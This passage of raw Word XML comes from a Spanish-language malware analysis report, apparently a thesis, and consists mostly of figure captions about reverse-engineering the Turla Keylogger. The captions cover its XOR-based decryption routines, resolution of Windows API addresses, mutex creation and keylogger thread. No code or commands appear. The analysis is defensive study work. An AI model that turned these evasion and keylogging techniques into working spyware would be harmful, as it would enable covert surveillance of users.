        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Muestra donde se observa una de las medidas de protección usadas.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18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0AC6AD40" wp14:editId="02F11664">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83" w:name="_Toc19358204"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>65</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Función que realiza</w:t>
      </w:r>
      <w:r w:rsidRPr="00624EB8">
        <w:t xml:space="preserve"> repetidas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> llamadas a la dirección </w:t>
      </w:r>
      <w:r w:rsidR="00AF37B2">
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t>180001750</w:t>
      </w:r>
      <w:bookmarkEnd w:id="183"/>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75F4BF42" wp14:editId="495A4B60">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84" w:name="_Toc19358205"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>66</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Código en C resultante del </w:t>
      </w:r>
      <w:r w:rsidR="003E09C7">
        <w:t>desensamblado</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003E09C7">
        <w:t>con múltiples llamadas de descifrado.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="184"/>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280A9125" wp14:editId="386F082A">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85" w:name="_Toc19358206"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>67</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Función </w:t>
      </w:r>
      <w:r w:rsidR="00242B59">
        <w:t xml:space="preserve">en C </w:t>
      </w:r>
      <w:r>
        <w:t>de</w:t>
      </w:r>
      <w:r w:rsidR="00242B59">
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> primer descifrado de Turla Keylogger</w:t>
      </w:r>
      <w:bookmarkEnd w:id="185"/>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1699174A" wp14:editId="0A1F382B">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86" w:name="_Toc19358207"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>68</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Parte de la tabla de traslación con valores utilizados en el XOR.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="186"/>
    </w:p>
    <w:p w:rsidR="00B63126" w:rsidRDefault="00B63126" w:rsidP="00B3402A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6ABA8BA1" wp14:editId="118BA0AB">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87" w:name="_Toc19358208"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>69</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Parte de la zona de memoria donde se decodifican los datos con XOR.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="187"/>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349F794B" wp14:editId="64FCFC6C">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8" w:name="_Toc19358209"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>70</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Visualización en modo gráfico de la subrutina de descifrado.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="188"/>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586CB4B1" wp14:editId="5D5CD4FF">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9" w:name="_Toc19358210"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>71</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Sección de la función principal del binario.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="189"/>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4D642DA7" wp14:editId="1738328B">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90" w:name="_Toc19358211"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>72</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Sección de la segunda función de descifrado.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="190"/>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61F7ADED" wp14:editId="75D8361C">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91" w:name="_Toc19358212"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>73</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Primer bloque del segundo descifrado y llamadas equivalentes en C.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="191"/>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02A0C849" wp14:editId="6D305296">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92" w:name="_Toc19358213"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>74</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Segunda función de descifrado</w:t>
      </w:r>
      <w:r w:rsidR="00740E8F">
        <w:t xml:space="preserve"> de Turla Keylogger</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="192"/>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71DD3BED" wp14:editId="4F50F88B">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93" w:name="_Toc19358214"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>75</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Gráfico de llamadas con funciones analizadas renombradas.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="193"/>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94" w:name="_Toc18453529"/>
      <w:bookmarkStart w:id="195" w:name="_Toc19810082"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Análisis dinámico</w:t>
      </w:r>
      <w:bookmarkEnd w:id="194"/>
      <w:bookmarkEnd w:id="195"/>
    </w:p>
    <w:p w:rsidR="006D7EA0" w:rsidRDefault="00C66143" w:rsidP="006223AA">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>Vista la dificultad en obtener el resultado del descifrado</w:t>
      </w:r>
      <w:r w:rsidR="00FA56A3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">en </w:t>
      </w:r>
      <w:r w:rsidR="00FA56A3">
        <w:t>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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00124410">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00124410">
            <w:instrText xml:space="preserve"> CITATION x64 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00124410">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[79]</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705BD9AA" wp14:editId="0EBA418D">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96" w:name="_Toc19358215"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* AR</w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve">ABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>76</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Fragmento de código donde se muestra el punto de entrada del binario a analizar.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="196"/>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1A717C31" wp14:editId="0EB61F99">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97" w:name="_Toc19358216"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>77</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Parte del mapa de memoria del binario cargado en x64dbg.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="197"/>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7BE6E21B" wp14:editId="637D287B">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8" w:name="_Toc19358217"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>78</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Función que realiza </w:t>
      </w:r>
      <w:r w:rsidR="00DB723C">
        <w:t>múltiples</w:t>
      </w:r>
      <w:r w:rsidR="00DD1B56">
        <w:t xml:space="preserve"> llamadas para descifrar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> datos de memoria.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="198"/>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5386EE7E" wp14:editId="7A78429E">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9" w:name="_Toc19358218"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>79</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Muestra de zona de memoria donde</w:t>
      </w:r>
      <w:r w:rsidR="00C56041">
        <w:t xml:space="preserve"> se dejan los datos una vez descifrado</w:t>
      </w:r>
      <w:r>
        <w:t>s.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="199"/>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2A0A859" wp14:editId="18674F67">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200" w:name="_Toc19358219"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="003A4AA2">
        <w:t>. Parte del</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> segundo descifrado donde establece valores en memoria.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="200"/>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4E5DD9A4" wp14:editId="01733D67">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3D073D35" wp14:editId="59C3FB36">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201" w:name="_Toc19358220"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>81</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Parte de la función de segundo descifrado donde se observa el XOR con 0x55</w:t>
      </w:r>
      <w:bookmarkEnd w:id="201"/>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End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DF019A">
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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E892D91" wp14:editId="7FA6038A">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202" w:name="_Toc19358221"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>82</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Datos descifrados con los nombres de las funciones de la API de Windows.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="202"/>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1EE2CC9B" wp14:editId="7DD0195E">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3" w:name="_Toc19358222"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>83</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Sección que recorre lista de funciones de la API para obtener direcciones en memoria.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="203"/>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EndPr/>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> CITATION Mic192 \l 3082 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[80]</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336A1ACB" wp14:editId="0892AA1A">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4" w:name="_Toc19358223"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>84</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Sección de la función GetProcAddressForCaller</w:t>
      </w:r>
      <w:bookmarkEnd w:id="204"/>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7D945E70" wp14:editId="3FF7FB54">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205" w:name="_Toc19358224"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>85</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Tabla con puntos de entrada en memoria a algunas funciones de la API de Windows</w:t>
      </w:r>
      <w:r w:rsidR="004E5BBC">
        <w:t xml:space="preserve"> que evidencian que hay una función de keylogger</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="205"/>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27719D1C" wp14:editId="4CA4FB9C">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206" w:name="_Toc19358225"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>86</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Sección de código donde crea cadena para el Mutex.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="206"/>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End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DF019A">
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
            </w:rPr>
            <w:t>[81]</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7055719A" wp14:editId="18F40A4C">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207" w:name="_Toc19358226"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>87</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Comprobación de la creación del Mutex.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="207"/>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End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DF019A">
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
            </w:rPr>
            <w:t>[82]</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653BC812" wp14:editId="417738CD">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8" w:name="_Toc19358227"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>88</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Muestra de Mutex creado dependiente de DLLLoader.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="208"/>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15CAD748" wp14:editId="21B1B196">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9" w:name="_Toc19358228"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>89</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Sección donde crea el Mutex para evitar llamar el hilo del keylogger más de una vez.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="209"/>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38F68575" wp14:editId="646ABBA8">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10" w:name="_Toc19358229"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>90</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Función que crea el hilo del proceso del keylogger.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="210"/>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6DAE1A48" wp14:editId="4B333ED5">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11" w:name="_Toc19358230"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>91</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
